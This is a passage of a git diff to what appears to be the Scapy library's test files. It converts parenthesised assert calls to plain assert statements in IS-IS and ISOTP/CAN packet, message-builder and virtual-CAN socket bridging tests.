+assert p[ISIS_CommonHdr].pdutype == 17 +assert p[ISIS_CommonHdr].hdrlen == 20 + Package Tests @@ -26,8 +26,8 @@ p = Dot3(dst="09:00:2b:00:00:05",src="00:00:00:aa:00:8c")/LLC()/ISIS_CommonHdr() ISIS_ProtocolsSupportedTlv(nlpids=["IPv4", "IPv6"]) ]) p = p.__class__(raw(p)) -assert(p[ISIS_P2P_Hello].pdulength == 24) -assert(network_layer_protocol_ids[p[ISIS_ProtocolsSupportedTlv].nlpids[1]] == "IPv6") +assert p[ISIS_P2P_Hello].pdulength == 24 +assert network_layer_protocol_ids[p[ISIS_ProtocolsSupportedTlv].nlpids[1]] == "IPv6" = LSP p = Dot3(dst="09:00:2b:00:00:05",src="00:00:00:aa:00:8c")/LLC()/ISIS_CommonHdr()/ISIS_L2_LSP( @@ -68,8 +68,8 @@ p = Dot3(dst="09:00:2b:00:00:05",src="00:00:00:aa:00:8c")/LLC()/ISIS_CommonHdr() ) ]) p = p.__class__(raw(p)) -assert(p[ISIS_L2_LSP].pdulength == 150) -assert(p[ISIS_L2_LSP].checksum == 0x8701) +assert p[ISIS_L2_LSP].pdulength == 150 +assert p[ISIS_L2_LSP].checksum == 0x8701 = LSP with Sub-TLVs p = Dot3(dst="09:00:2b:00:00:05",src="00:00:00:aa:00:8c")/LLC()/ISIS_CommonHdr()/ISIS_L2_LSP( @@ -162,18 +162,18 @@ p = Dot3(dst="09:00:2b:00:00:05",src="00:00:00:aa:00:8c")/LLC()/ISIS_CommonHdr() ) ]) p = p.__class__(raw(p)) -assert(p[ISIS_L2_LSP].pdulength == 332) -assert(p[ISIS_L2_LSP].checksum == 0x074f) -assert(p[ISIS_ExtendedIpReachabilityTlv].pfxs[1].subtlvs[1].tags[0]==54321) -assert(p[ISIS_ExtendedIpReachabilityTlv].pfxs[2].subtlvs[0].sid==1000) -assert(p[ISIS_Ipv6ReachabilityTlv].pfxs[1].subtlvs[0].len==8) -assert(p[ISIS_ExtendedIsReachabilityTlv].neighbours[0].subtlvs[0].address=='172.16.8.4') -assert(p[ISIS_ExtendedIsReachabilityTlv].neighbours[0].subtlvs[1].localid==418) -assert(p[ISIS_ExtendedIsReachabilityTlv].neighbours[0].subtlvs[3].maxbw==125000000) -assert(p[ISIS_ExtendedIsReachabilityTlv].neighbours[0].subtlvs[4].unrsvbw[0]==125000000) -assert(p[ISIS_ExtendedIsReachabilityTlv].neighbours[0].subtlvs[5].temetric==16777214) -assert(p[ISIS_ExternalIpReachabilityTlv].type==130) -assert(p[ISIS_RouterCapabilityTlv].type==242) -assert(p[ISIS_RouterCapabilityTlv].subtlvs[0].srgb_ranges[0].range==1000) -assert(p[ISIS_RouterCapabilityTlv].subtlvs[0].srgb_ranges[0].sid_label.sid==10) -assert(p[ISIS_RouterCapabilityTlv].subtlvs[1].algorithms==[0, 1]) \ No newline at end of file +assert p[ISIS_L2_LSP].pdulength == 332 +assert p[ISIS_L2_LSP].checksum == 0x074f +assert p[ISIS_ExtendedIpReachabilityTlv].pfxs[1].subtlvs[1].tags[0]==54321 +assert p[ISIS_ExtendedIpReachabilityTlv].pfxs[2].subtlvs[0].sid==1000 +assert p[ISIS_Ipv6ReachabilityTlv].pfxs[1].subtlvs[0].len==8 +assert p[ISIS_ExtendedIsReachabilityTlv].neighbours[0].subtlvs[0].address=='172.16.8.4' +assert p[ISIS_ExtendedIsReachabilityTlv].neighbours[0].subtlvs[1].localid==418 +assert p[ISIS_ExtendedIsReachabilityTlv].neighbours[0].subtlvs[3].maxbw==125000000 +assert p[ISIS_ExtendedIsReachabilityTlv].neighbours[0].subtlvs[4].unrsvbw[0]==125000000 +assert p[ISIS_ExtendedIsReachabilityTlv].neighbours[0].subtlvs[5].temetric==16777214 +assert p[ISIS_ExternalIpReachabilityTlv].type==130 +assert p[ISIS_RouterCapabilityTlv].type==242 +assert p[ISIS_RouterCapabilityTlv].subtlvs[0].srgb_ranges[0].range==1000 +assert p[ISIS_RouterCapabilityTlv].subtlvs[0].srgb_ranges[0].sid_label.sid==10 +assert p[ISIS_RouterCapabilityTlv].subtlvs[1].algorithms==[0, 1] \ No newline at end of file diff --git a/test/contrib/isotp_message_builder.uts b/test/contrib/isotp_message_builder.uts index 3079bb43837..27a67bb90a2 100644 --- a/test/contrib/isotp_message_builder.uts +++ b/test/contrib/isotp_message_builder.uts @@ -37,66 +37,66 @@ m.feed(CAN(identifier=0x241, data=dhex("24 1C 1D 1E 1F 20 21 22"))) m.feed(CAN(identifier=0x241, data=dhex("25 23 24 25 26 27 28" ))) = Verify there is a ready message in the machine -assert(m.count == 1) +assert m.count == 1 = Extract the message from the machine msg = m.pop() -assert(m.count == 0) -assert(msg.rx_id == 0x241) -assert(msg.rx_ext_address is None) -assert(msg.tx_id == 0x641) -assert(msg.ext_address is None) -assert(msg.time == 1000) +assert m.count == 0 +assert msg.rx_id == 0x241 +assert msg.rx_ext_address is None +assert msg.tx_id == 0x641 +assert msg.ext_address is None +assert msg.time == 1000 expected = dhex("01 02 03 04 05 06 07 08 09 0A 0B 0C 0D 0E 0F 10 11 12 13 14 15 16 17 18 19 1A 1B 1C 1D 1E 1F 20 21 22 23 24 25 26 27 28") -assert(msg.data == expected) +assert msg.data == expected = Verify that no error happens when there is not enough data m = ISOTPMessageBuilder() m.feed(CAN(identifier=0x241, data=dhex("04 AB CD EF"))) msg = m.pop() -assert(msg is None) +assert msg is None = Verify that no error happens when there is no data m = ISOTPMessageBuilder() m.feed(CAN(identifier=0x241, data=dhex(""))) msg = m.pop() -assert(msg is None) +assert msg is None = Verify a single frame without EA m = ISOTPMessageBuilder() m.feed(CAN(identifier=0x241, data=dhex("04 AB CD EF 04"))) msg = m.pop() -assert(msg.rx_id == 0x241) -assert(msg.rx_ext_address is None) -assert(msg.data == dhex("AB CD EF 04")) +assert msg.rx_id == 0x241 +assert msg.rx_ext_address is None +assert msg.data == dhex("AB CD EF 04") = Single frame without EA, with excessive bytes in CAN frame m = ISOTPMessageBuilder() m.feed(CAN(identifier=0x241, data=dhex("03 AB CD EF AB CD EF AB"))) msg = m.pop() -assert(msg.rx_id == 0x241) -assert(msg.rx_ext_address is None) -assert(msg.data == dhex("AB CD EF")) +assert msg.rx_id == 0x241 +assert msg.rx_ext_address is None +assert msg.data == dhex("AB CD EF") = Verify a single frame with EA m = ISOTPMessageBuilder() m.feed(CAN(identifier=0x241, data=dhex("E2 04 01 02 03 04"))) msg = m.pop() -assert(msg.rx_id == 0x241) -assert(msg.rx_ext_address is 0xE2) -assert(msg.data == dhex("01 02 03 04")) +assert msg.rx_id == 0x241 +assert msg.rx_ext_address is 0xE2 +assert msg.data == dhex("01 02 03 04") = Single CAN frame that has 2 valid interpretations m = ISOTPMessageBuilder() m.feed(CAN(identifier=0x241, data=dhex("04 01 02 03 04"))) msg = m.pop(0x241, None) -assert(msg.rx_id == 0x241) -assert(msg.rx_ext_address is None) -assert(msg.data == dhex("01 02 03 04")) +assert msg.rx_id == 0x241 +assert msg.rx_ext_address is None +assert msg.data == dhex("01 02 03 04") msg = m.pop() -assert(msg.rx_id == 0x241) -assert(msg.rx_ext_address == 0x04) -assert(msg.data == dhex("02")) +assert msg.rx_id == 0x241 +assert msg.rx_ext_address == 0x04 +assert msg.data == dhex("02") = Verify multiple frames with EA m = ISOTPMessageBuilder() @@ -112,12 +112,12 @@ m.feed(CAN(identifier=0x241, data=dhex("EA 24 18 19 1A 1B 1C 1D"))) m.feed(CAN(identifier=0x241, data=dhex("EA 25 1E 1F 20 21 22 23"))) m.feed(CAN(identifier=0x241, data=dhex("EA 26 24 25 26 27 28" ))) msg = m.pop() -assert(msg.rx_id == 0x241) -assert(msg.rx_ext_address is 0xEA) -assert(msg.tx_id == 0x641) -assert(msg.ext_address is 0xEA) -assert(msg.time == 1005) -assert(msg.data == dhex("01 02 03 04 05 06 07 08 09 0A 0B 0C 0D 0E 0F 10 11 12 13 14 15 16 17 18 19 1A 1B 1C 1D 1E 1F 20 21 22 23 24 25 26 27 28")) +assert msg.rx_id == 0x241 +assert msg.rx_ext_address is 0xEA +assert msg.tx_id == 0x641 +assert msg.ext_address is 0xEA +assert msg.time == 1005 +assert msg.data == dhex("01 02 03 04 05 06 07 08 09 0A 0B 0C 0D 0E 0F 10 11 12 13 14 15 16 17 18 19 1A 1B 1C 1D 1E 1F 20 21 22 23 24 25 26 27 28") = Verify multiple frames with EA 2 m = ISOTPMessageBuilder() @@ -131,11 +131,11 @@ m.feed(CAN(identifier=0x241, data=dhex("EA 24 18 19 1A 1B 1C 1D"))) m.feed(CAN(identifier=0x241, data=dhex("EA 25 1E 1F 20 21 22 23"))) m.feed(CAN(identifier=0x241, data=dhex("EA 26 24 25 26 27 28" ))) msg = m.pop() -assert(msg.rx_id == 0x241) -assert(msg.rx_ext_address is 0xEA) -assert(msg.tx_id == 0x641) -assert(msg.ext_address is 0xAE) -assert(msg.data == dhex("01 02 03 04 05 06 07 08 09 0A 0B 0C 0D 0E 0F 10 11 12 13 14 15 16 17 18 19 1A 1B 1C 1D 1E 1F 20 21 22 23 24 25 26 27 28")) +assert msg.rx_id == 0x241 +assert msg.rx_ext_address is 0xEA +assert msg.tx_id == 0x641 +assert msg.ext_address is 0xAE +assert msg.data == dhex("01 02 03 04 05 06 07 08 09 0A 0B 0C 0D 0E 0F 10 11 12 13 14 15 16 17 18 19 1A 1B 1C 1D 1E 1F 20 21 22 23 24 25 26 27 28") = Verify that an EA starting with 1 will still work m = ISOTPMessageBuilder() @@ -145,11 +145,11 @@ m.feed(CAN(identifier=0x241, data=dhex("1A 21 06 07 08 09 0A 0B"))) m.feed(CAN(identifier=0x241, data=dhex("1A 22 0C 0D 0E 0F 10 11"))) m.feed(CAN(identifier=0x241, data=dhex("1A 23 12 13 14 15 16 17"))) msg = m.pop() -assert(msg.rx_id == 0x241) -assert(msg.rx_ext_address is 0x1A) -assert(msg.tx_id == 0x641) -assert(msg.ext_address is 0x1A) -assert(msg.data == dhex("01 02 03 04 05 06 07 08 09 0A 0B 0C 0D 0E 0F 10 11 12 13 14")) +assert msg.rx_id == 0x241 +assert msg.rx_ext_address is 0x1A +assert msg.tx_id == 0x641 +assert msg.ext_address is 0x1A +assert msg.data == dhex("01 02 03 04 05 06 07 08 09 0A 0B 0C 0D 0E 0F 10 11 12 13 14") = Verify that an EA of 07 will still work m = ISOTPMessageBuilder() @@ -157,11 +157,11 @@ m.feed(CAN(identifier=0x241, data=dhex("07 10 0A 01 02 03 04 05"))) m.feed(CAN(identifier=0x641, data=dhex("07 30 03 00" ))) m.feed(CAN(identifier=0x241, data=dhex("07 21 06 07 08 09 0A 0B"))) msg = m.pop(0x241, 0x07) -assert(msg.rx_id == 0x241) -assert(msg.rx_ext_address is 0x07) -assert(msg.tx_id == 0x641) -assert(msg.ext_address is 0x07) -assert(msg.data == dhex("01 02 03 04 05 06 07 08 09 0A")) +assert msg.rx_id == 0x241 +assert msg.rx_ext_address is 0x07 +assert msg.tx_id == 0x641 +assert msg.ext_address is 0x07 +assert msg.data == dhex("01 02 03 04 05 06 07 08 09 0A") = Verify that three interleaved messages can be sniffed simultaneously on the same identifier and extended address (very unrealistic) m = ISOTPMessageBuilder() @@ -186,24 +186,24 @@ m.feed(CAN(identifier=0x241, data=dhex("EA 22 3C 3D 3E 3F 40" ))) # end of mes m.feed(CAN(identifier=0x241, data=dhex("EA 25 1E 1F 20 21 22 23"))) m.feed(CAN(identifier=0x241, data=dhex("EA 26 24 25 26 27 28" ))) # end of message A msg = m.pop() -assert(msg.rx_id == 0x241) -assert(msg.rx_ext_address is 0xEA) -assert(msg.data == dhex("A6 A7 A8")) -assert(msg.time == 200) +assert msg.rx_id == 0x241 +assert msg.rx_ext_address is 0xEA +assert msg.data == dhex("A6 A7 A8") +assert msg.time == 200 msg = m.pop() -assert(msg.rx_id == 0x241) -assert(msg.rx_ext_address is 0xEA) -assert(msg.tx_id == 0x641) -assert(msg.ext_address is 0xEA) -assert(msg.time == 400) -assert(msg.data == dhex("31 32 33 34 35 36 37 38 39 3A 3B 3C 3D 3E 3F 40")) +assert msg.rx_id == 0x241 +assert msg.rx_ext_address is 0xEA +assert msg.tx_id == 0x641 +assert msg.ext_address is 0xEA +assert msg.time == 400 +assert msg.data == dhex("31 32 33 34 35 36 37 38 39 3A 3B 3C 3D 3E 3F 40") msg = m.pop() -assert(msg.rx_id == 0x241) -assert(msg.rx_ext_address is 0xEA) -assert(msg.tx_id == 0x641) -assert(msg.ext_address is 0xEA) -assert(msg.time == 300) -assert(msg.data == dhex("01 02 03 04 05 06 07 08 09 0A 0B 0C 0D 0E 0F 10 11 12 13 14 15 16 17 18 19 1A 1B 1C 1D 1E 1F 20 21 22 23 24 25 26 27 28")) +assert msg.rx_id == 0x241 +assert msg.rx_ext_address is 0xEA +assert msg.tx_id == 0x641 +assert msg.ext_address is 0xEA +assert msg.time == 300 +assert msg.data == dhex("01 02 03 04 05 06 07 08 09 0A 0B 0C 0D 0E 0F 10 11 12 13 14 15 16 17 18 19 1A 1B 1C 1D 1E 1F 20 21 22 23 24 25 26 27 28") = Verify multiple frames with EA from list @@ -220,11 +220,11 @@ msgs = [ CAN(identifier=0x241, data=dhex("EA 26 24 25 26 27 28" ))] m.feed(msgs) msg = m.pop() -assert(msg.rx_id == 0x241) -assert(msg.rx_ext_address is 0xEA) -assert(msg.tx_id == 0x641) -assert(msg.ext_address is 0xEA) -assert(msg.data == dhex("01 02 03 04 05 06 07 08 09 0A 0B 0C 0D 0E 0F 10 11 12 13 14 15 16 17 18 19 1A 1B 1C 1D 1E 1F 20 21 22 23 24 25 26 27 28")) +assert msg.rx_id == 0x241 +assert msg.rx_ext_address is 0xEA +assert msg.tx_id == 0x641 +assert msg.ext_address is 0xEA +assert msg.data == dhex("01 02 03 04 05 06 07 08 09 0A 0B 0C 0D 0E 0F 10 11 12 13 14 15 16 17 18 19 1A 1B 1C 1D 1E 1F 20 21 22 23 24 25 26 27 28") = Verify multiple frames with EA from list and iterator m = ISOTPMessageBuilder() @@ -247,11 +247,11 @@ assert len(m) == 3 isotpmsgs = [x for x in m] assert len(isotpmsgs) == 3 msg = isotpmsgs[0] -assert(msg.rx_id == 0x241) -assert(msg.rx_ext_address is 0xEA) -assert(msg.tx_id == 0x641) -assert(msg.ext_address is 0xEA) -assert(msg.data == dhex("01 02 03 04 05 06 07 08 09 0A 0B 0C 0D 0E 0F 10 11 12 13 14 15 16 17 18 19 1A 1B 1C 1D 1E 1F 20 21 22 23 24 25 26 27 28")) +assert msg.rx_id == 0x241 +assert msg.rx_ext_address is 0xEA +assert msg.tx_id == 0x641 +assert msg.ext_address is 0xEA +assert msg.data == dhex("01 02 03 04 05 06 07 08 09 0A 0B 0C 0D 0E 0F 10 11 12 13 14 15 16 17 18 19 1A 1B 1C 1D 1E 1F 20 21 22 23 24 25 26 27 28") assert isotpmsgs[1] == isotpmsgs[2] @@ -259,5 +259,5 @@ assert isotpmsgs[1] == isotpmsgs[2] m = ISOTPMessageBuilder(basecls=Raw) m.feed(CAN(identifier=0x241, data=dhex("04 AB CD EF 04"))) msg = m.pop() -assert(msg.load == dhex("AB CD EF 04")) -assert(type(msg) == Raw) \ No newline at end of file +assert msg.load == dhex("AB CD EF 04") +assert type(msg) == Raw \ No newline at end of file diff --git a/test/contrib/isotp_native_socket.uts b/test/contrib/isotp_native_socket.uts index be9d5621a01..62d7dd8db1a 100644 --- a/test/contrib/isotp_native_socket.uts +++ b/test/contrib/isotp_native_socket.uts @@ -28,9 +28,9 @@ with new_can_socket0() as isocan, ISOTPSoftSocket(isocan, tx_id=0x642, rx_id=0x2 p = subprocess.Popen(["isotpsend", "-s", "242", "-d", "642", iface0], stdin=subprocess.PIPE, universal_newlines=True) p.communicate(message) r = p.returncode - assert(r == 0) + assert r == 0 isotp = s.recv() - assert(isotp.data == dhex(message)) + assert isotp.data == dhex(message) = Compatibility with isotpsend - extended addresses @@ -41,9 +41,9 @@ with new_can_socket0() as isocan, ISOTPSoftSocket(isocan, tx_id=0x644, rx_id=0x2 p = subprocess.Popen(["isotpsend", "-s", "244", "-d", "644", "-x", "ee:aa", iface0], stdin=subprocess.PIPE, universal_newlines=True) p.communicate(message) r = p.returncode - assert(r == 0) + assert r == 0 isotp = s.recv() - assert(isotp.data == dhex(message)) + assert isotp.data == dhex(message) = Compatibility with isotprecv @@ -58,7 +58,7 @@ with new_can_socket0() as isocan, ISOTPSoftSocket(isocan, tx_id=0x643, rx_id=0x2 timer = threading.Timer(1, lambda: p.terminate() if p.poll() else p.wait()) timer.start() # Timeout the receiver after 1 second r = p.wait() -assert(0 == r) +assert 0 == r result = None for i in range(10): @@ -67,9 +67,9 @@ for i in range(10): result = p.stdout.readline().decode().strip() break -assert(result is not None) +assert result is not None result_data = dhex(result) -assert(result_data == isotp.data) +assert result_data == isotp.data timer.join(5) assert not timer.is_alive() @@ -87,7 +87,7 @@ with new_can_socket0() as isocan, ISOTPSoftSocket(isocan, tx_id=0x645, rx_id=0x2 timer = threading.Timer(1, lambda: p.terminate() if p.poll() else p.wait()) timer.start() # Timeout the receiver after 1 second r = p.wait() -assert(0 == r) +assert 0 == r result = None for i in range(10): @@ -96,9 +96,9 @@ for i in range(10): result = p.stdout.readline().decode().strip() break -assert(result is not None) +assert result is not None result_data = dhex(result) -assert(result_data == isotp.data) +assert result_data == isotp.data timer.join(5) assert not timer.is_alive() @@ -140,7 +140,7 @@ for kwargs1, kwargs2 in kwargs: with ISOTPSoftSocket(iface0, **kwargs1) as s, ISOTPNativeSocket(iface0, **kwargs2) as ns: ns.send(ISOTP(bytes.fromhex(message))) isotp = s.recv() - assert(isotp.data == dhex(message)) + assert isotp.data == dhex(message) ns.send(ISOTP(bytes.fromhex("00 11 22"))) isotp = s.recv() assert (isotp.data == dhex("00 11 22")) @@ -148,7 +148,7 @@ for kwargs1, kwargs2 in kwargs: with ISOTPNativeSocket(iface0, **kwargs1) as s, ISOTPSoftSocket(iface0, **kwargs2) as ns: ns.send(ISOTP(bytes.fromhex(message))) isotp = s.recv() - assert(isotp.data == dhex(message)) + assert isotp.data == dhex(message) ns.send(ISOTP(bytes.fromhex("00 11 22"))) isotp = s.recv() assert (isotp.data == dhex("00 11 22")) @@ -171,8 +171,8 @@ with new_can_socket(iface0) as cans: s = ISOTPNativeSocket(iface0, tx_id=0x641, rx_id=0x241) s.send(ISOTP(data=dhex("01 02 03 04 05"))) can = cans.sniff(timeout=1, count=1)[0] - assert(can.identifier == 0x641) - assert(can.data == dhex("05 01 02 03 04 05")) + assert can.identifier == 0x641 + assert can.data == dhex("05 01 02 03 04 05") = Send single frame ISOTP message Test init with CANSocket @@ -181,8 +181,8 @@ cans = CANSocket(iface0) s = ISOTPNativeSocket(cans, tx_id=0x641, rx_id=0x241) s.send(ISOTP(data=dhex("01 02 03 04 05"))) can = cans.sniff(timeout=1, count=1)[0] -assert(can.identifier == 0x641) -assert(can.data == dhex("05 01 02 03 04 05")) +assert can.identifier == 0x641 +assert can.data == dhex("05 01 02 03 04 05") cans.close() @@ -214,14 +214,14 @@ with new_can_socket(iface0) as cans: evt.wait(timeout=5) s.send(ISOTP(data=dhex("01 02 03 04 05 06 07 08"))) can = cans.sniff(timeout=1, count=1)[0] - assert(can.identifier == 0x641) - assert(can.data == dhex("10 08 01 02 03 04 05 06")) + assert can.identifier == 0x641 + assert can.data == dhex("10 08 01 02 03 04 05 06") can = cans.sniff(timeout=1, count=1)[0] - assert(can.identifier == 0x241) - assert(can.data == dhex("30 00 00")) + assert can.identifier == 0x241 + assert can.data == dhex("30 00 00") can = cans.sniff(timeout=1, count=1)[0] - assert(can.identifier == 0x641) - assert(can.data == dhex("21 07 08")) + assert can.identifier == 0x641 + assert can.data == dhex("21 07 08") t.join(timeout=5) assert not t.is_alive() @@ -232,7 +232,7 @@ s = ISOTPNativeSocket(iface0, tx_id=0x641, rx_id=0x241, padding=True) with new_can_socket(iface0) as cans: s.send(ISOTP(data=dhex("01"))) can = cans.sniff(timeout=1, count=1)[0] - assert(can.length == 8) + assert can.length == 8 = Send a two-frame ISOTP message with padding @@ -252,14 +252,14 @@ with new_can_socket(iface0) as cans: s = ISOTPNativeSocket(iface0, tx_id=0x641, rx_id=0x241, padding=True) s.send(ISOTP(data=dhex("01 02 03 04 05 06 07 08"))) can = cans.sniff(timeout=1, count=1)[0] - assert(can.identifier == 0x641) - assert(can.data == dhex("10 08 01 02 03 04 05 06")) + assert can.identifier == 0x641 + assert can.data == dhex("10 08 01 02 03 04 05 06") can = cans.sniff(timeout=1, count=1)[0] - assert(can.identifier == 0x241) - assert(can.data == dhex("30 00 00")) + assert can.identifier == 0x241 + assert can.data == dhex("30 00 00") can = cans.sniff(timeout=1, count=1)[0] - assert(can.identifier == 0x641) - assert(can.data == dhex("21 07 08 CC CC CC CC CC")) + assert can.identifier == 0x641 + assert can.data == dhex("21 07 08 CC CC CC CC CC") thread.join(5) assert not thread.is_alive() @@ -270,7 +270,7 @@ s = ISOTPNativeSocket(iface0, tx_id=0x641, rx_id=0x241, padding=False) with new_can_socket(iface0) as cans: cans.send(CAN(identifier=0x241, data=dhex("02 05 06 00 00 00 00 00"))) res = s.recv() - assert(res.data == dhex("05 06")) + assert res.data == dhex("05 06") = Receive a padded single frame ISOTP message with padding enabled @@ -279,7 +279,7 @@ s = ISOTPNativeSocket(iface0, tx_id=0x641, rx_id=0x241, padding=True) with new_can_socket(iface0) as cans: cans.send(CAN(identifier=0x241, data=dhex("02 05 06 00 00 00 00 00"))) res = s.recv() - assert(res.data == dhex("05 06")) + assert res.data == dhex("05 06") = Receive a non-padded single frame ISOTP message with padding enabled @@ -288,7 +288,7 @@ s = ISOTPNativeSocket(iface0, tx_id=0x641, rx_id=0x241, padding=True) with new_can_socket(iface0) as cans: cans.send(CAN(identifier=0x241, data=dhex("02 05 06"))) res = s.recv() - assert(res.data == dhex("05 06")) + assert res.data == dhex("05 06") = Receive a padded two-frame ISOTP message with padding enabled @@ -298,7 +298,7 @@ with new_can_socket(iface0) as cans: cans.send(CAN(identifier=0x241, data=dhex("10 09 01 02 03 04 05 06"))) cans.send(CAN(identifier=0x241, data=dhex("21 07 08 09 00 00 00 00"))) res = s.recv() - assert(res.data == dhex("01 02 03 04 05 06 07 08 09")) + assert res.data == dhex("01 02 03 04 05 06 07 08 09") = Receive a padded two-frame ISOTP message with padding disabled @@ -308,7 +308,7 @@ with new_can_socket(iface0) as cans: cans.send(CAN(identifier=0x241, data=dhex("10 09 01 02 03 04 05 06"))) cans.send(CAN(identifier=0x241, data=dhex("21 07 08 09 00 00 00 00"))) res = s.recv() - assert(res.data == dhex("01 02 03 04 05 06 07 08 09")) + assert res.data == dhex("01 02 03 04 05 06 07 08 09") = Receive a single frame ISOTP message @@ -317,11 +317,11 @@ s = ISOTPNativeSocket(iface0, tx_id=0x641, rx_id=0x241) with new_can_socket(iface0) as cans: cans.send(CAN(identifier = 0x241, data = dhex("05 01 02 03 04 05"))) isotp = s.recv() - assert(isotp.data == dhex("01 02 03 04 05")) - assert(isotp.tx_id == 0x641) - assert(isotp.rx_id == 0x241) - assert(isotp.ext_address == None) - assert(isotp.rx_ext_address == None) + assert isotp.data == dhex("01 02 03 04 05") + assert isotp.tx_id == 0x641 + assert isotp.rx_id == 0x241 + assert isotp.ext_address == None + assert isotp.rx_ext_address == None = Receive a single frame ISOTP message, with extended addressing @@ -330,11 +330,11 @@ s = ISOTPNativeSocket(iface0, tx_id=0x641, rx_id=0x241, ext_address=0xc0, rx_ext with new_can_socket(iface0) as cans: cans.send(CAN(identifier = 0x241, data = dhex("EA 05 01 02 03 04 05"))) isotp = s.recv() - assert(isotp.data == dhex("01 02 03 04 05")) - assert(isotp.tx_id == 0x641) - assert(isotp.rx_id == 0x241) - assert(isotp.ext_address == 0xc0) - assert(isotp.rx_ext_address == 0xea) + assert isotp.data == dhex("01 02 03 04 05") + assert isotp.tx_id == 0x641 + assert isotp.rx_id == 0x241 + assert isotp.ext_address == 0xc0 + assert isotp.rx_ext_address == 0xea = Receive a two-frame ISOTP message @@ -344,7 +344,7 @@ with new_can_socket(iface0) as cans: cans.send(CAN(identifier = 0x241, data = dhex("10 0B 01 02 03 04 05 06"))) cans.send(CAN(identifier = 0x241, data = dhex("21 07 08 09 10 11"))) isotp = s.recv() - assert(isotp.data == dhex("01 02 03 04 05 06 07 08 09 10 11")) + assert isotp.data == dhex("01 02 03 04 05 06 07 08 09 10 11") = Receive a two-frame ISOTP message and test python with statement exit_if_no_isotp_module() @@ -353,7 +353,7 @@ with ISOTPNativeSocket(iface0, tx_id=0x641, rx_id=0x241) as s: cans.send(CAN(identifier = 0x241, data = dhex("10 0B 01 02 03 04 05 06"))) cans.send(CAN(identifier = 0x241, data = dhex("21 07 08 09 10 11"))) isotp = s.recv() - assert(isotp.data == dhex("01 02 03 04 05 06 07 08 09 10 11")) + assert isotp.data == dhex("01 02 03 04 05 06 07 08 09 10 11") = ISOTP Socket sr1 test @@ -378,9 +378,9 @@ def receiver(): rx = cans.sniff(timeout=1, count=1, started_callback=receiver_up.set)[0] cans.send(CAN(identifier=0x321, length=4, data=b'\x03\x7f\x22\x33')) expectedrx = CAN(identifier=0x123, length=4, data=b'\x03\x11\x22\x33') - assert(rx.length == expectedrx.length) - assert(rx.data == expectedrx.data) - assert(rx.identifier == expectedrx.identifier) + assert rx.length == expectedrx.length + assert rx.data == expectedrx.data + assert rx.identifier == expectedrx.identifier txThread = threading.Thread(target=sender) txThread.start() @@ -388,9 +388,9 @@ receiver() txThread.join(timeout=5) assert not txThread.is_alive() -assert(rx2 is not None) -assert(rx2 == ISOTP(b'\x7f\x22\x33')) -assert(rx2.answers(txmsg)) +assert rx2 is not None +assert rx2 == ISOTP(b'\x7f\x22\x33') +assert rx2.answers(txmsg) = ISOTP Socket sr1 and ISOTP test exit_if_no_isotp_module() @@ -418,10 +418,10 @@ receiver() txThread.join(timeout=5) assert not txThread.is_alive() -assert(rx == msg) -assert(rxSock.send(msg)) -assert(rx2 is not None) -assert(rx2 == msg) +assert rx == msg +assert rxSock.send(msg) +assert rx2 is not None +assert rx2 == msg = ISOTP Socket sr1 and ISOTP test vice versa exit_if_no_isotp_module() @@ -451,9 +451,9 @@ sender() rxThread.join(timeout=5) assert not rxThread.is_alive() -assert(rx == msg) -assert(rx2[0] == msg) -assert(sent) +assert rx == msg +assert rx2[0] == msg +assert sent = ISOTP Socket sniff exit_if_no_isotp_module() @@ -468,15 +468,15 @@ def receiver(): rx = rxSock.sniff(count=5, timeout=1, started_callback=receiver_up.set) msg = ISOTP(b'\x11\x22\x33\x11\x22\x33\x11\x22\x33\x11\x22\x33') msg.data += b'0' - assert(rx[0] == msg) + assert rx[0] == msg msg.data += b'1' - assert(rx[1] == msg) + assert rx[1] == msg msg.data += b'2' - assert(rx[2] == msg) + assert rx[2] == msg msg.data += b'3' - assert(rx[3] == msg) + assert rx[3] == msg msg.data += b'4' - assert(rx[4] == msg) + assert rx[4] == msg global succ succ = True @@ -484,15 +484,15 @@ def sender(): receiver_up.wait(timeout=5) msg = ISOTP(b'\x11\x22\x33\x11\x22\x33\x11\x22\x33\x11\x22\x33') msg.data += b'0' - assert(txSock.send(msg)) + assert txSock.send(msg) msg.data += b'1' - assert(txSock.send(msg)) + assert txSock.send(msg) msg.data += b'2' - assert(txSock.send(msg)) + assert txSock.send(msg) msg.data += b'3' - assert(txSock.send(msg)) + assert txSock.send(msg) msg.data += b'4' - assert(txSock.send(msg)) + assert txSock.send(msg) rxThread = threading.Thread(target=receiver) rxThread.start() @@ -500,7 +500,7 @@ sender() rxThread.join(timeout=5) assert not rxThread.is_alive() -assert(succ) +assert succ + ISOTPNativeSocket MITM attack tests ~ python3_only vcan_socket needs_root linux @@ -540,7 +540,7 @@ isoTpSocket1.close() threadBridge.join(timeout=5) assert not threadBridge.is_alive() -assert(bSucc) +assert bSucc = bridge and sniff with isotp native sockets set up vcan0 and vcan1 for package change to vcan1 exit_if_no_isotp_module() @@ -579,7 +579,7 @@ isoTpSocket1.close() threadBridge.join(timeout=5) assert not threadBridge.is_alive() -assert(bSucc) +assert bSucc = bridge and sniff with isotp native sockets set up vcan0 and vcan1 for package forwarding in both directions exit_if_no_isotp_module() @@ -623,7 +623,7 @@ isoTpSocket1.close() threadBridge.join(timeout=5) assert not threadBridge.is_alive() -assert(bSucc) +assert bSucc = bridge and sniff with isotp native sockets set up vcan0 and vcan1 for package change in both directions exit_if_no_isotp_module() @@ -670,7 +670,7 @@ isoTpSocket1.close() threadBridge.join(timeout=5) assert not threadBridge.is_alive() -assert(bSucc) +assert bSucc + Cleanup diff --git a/test/contrib/isotp_packet.uts b/test/contrib/isotp_packet.uts index fa3ec1cd368..d3f11a322c6 100644 --- a/test/contrib/isotp_packet.uts +++ b/test/contrib/isotp_packet.uts @@ -24,49 +24,49 @@ else: = Creation of an empty ISOTP packet p = ISOTP() -assert(p.data == b"") -assert(p.tx_id is None and p.rx_id is None and p.ext_address is None and p.rx_ext_address is None) -assert(bytes(p) == b"") +assert p.data == b"" +assert p.tx_id is None and p.rx_id is None and p.ext_address is None and p.rx_ext_address is None +assert bytes(p) == b"" = Creation of a simple ISOTP packet with tx_id p = ISOTP(b"eee", tx_id=0x241) -assert(p.tx_id == 0x241) -assert(p.data == b"eee") -assert(bytes(p) == b"eee") +assert p.tx_id == 0x241 +assert p.data == b"eee" +assert bytes(p) == b"eee" = Creation of a simple ISOTP packet with ext_address p = ISOTP(b"eee", ext_address=0x41) -assert(p.ext_address == 0x41) -assert(p.data == b"eee") -assert(bytes(p) == b"eee") +assert p.ext_address == 0x41 +assert p.data == b"eee" +assert bytes(p) == b"eee" = Creation of a simple 